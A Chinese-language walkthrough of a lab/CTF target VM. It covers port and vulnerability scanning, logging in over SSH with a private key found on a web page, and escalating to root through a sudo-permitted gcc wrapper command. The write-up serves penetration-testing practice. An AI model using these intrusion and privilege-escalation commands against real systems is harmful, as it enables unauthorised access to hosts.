一.信息搜集
1.主机探测
发现靶机的地址为 192.168.247.208
2.端口扫描
nmap -sS -A -p- 192.168.247.208 //发现开放了22和80端口
3.漏洞扫描
nikto扫描发现了靶机的一些版本信息,包括一些漏洞
nikto -h 192.168.247.208
nmap漏洞扫描
nmap --script=vuln -p22,80 192.168.247.208
二.调试测试
1.web渗透+信息搜集
访问原页面
查看网页源代码并无有效信息
访问我们开始利用namp扫描出来的 那个目录:/d41d8cd98f00b204e9800998ecf8427e.php
发现是个open ssh私钥 我们后面可以尝试用openssh私钥进行免密码登录 ssh
2.我们将靶机的openssh私钥,保存到id_rsa文件里 后面利用这个私钥进行免密码登录
我们现在尝试寻找ssh登录的用户,在实际的渗透测试下,如果我们没有找到ssh私钥的用户,我们可以尝试下root用户,但是这个靶场不是root用户
ssh -i id_rsa root@192.168.247.208
返回页面 发现这个用户是mpampis的
私钥文件 “id_rsa” 的权限设置有问题。SSH 客户端要求私钥文件的权限必须是非常严格的,通常是 600 或者 400,表示只有拥有者才可读写。
chmod 600 id_rsa
利用其进行登录
ssh -i id_rsa mpampis@192.168.247.208 发现登录成功
3.user.txt 拿到root的flag
三.提权
1.sudo提权
cat /etc/crontab查看是否有定时进程,发现没有定时任务
cat /etc/crontab
查看哪些具有SUID提权
find / -user root -perm -4000 -print 2>/dev/null
sudo 命令通常用于赋予特定用户或用户组在系统上执行特权操作的权限,而 (root) NOPASSWD 说明了用户 mpampis 可以以 root 权限执行指定的命令而无需输入密码
sudo -l
2.利用gcc提权
sudo gcc -wrapper /bin/bash,-s .
3.root权限
发现成功提权到root权限了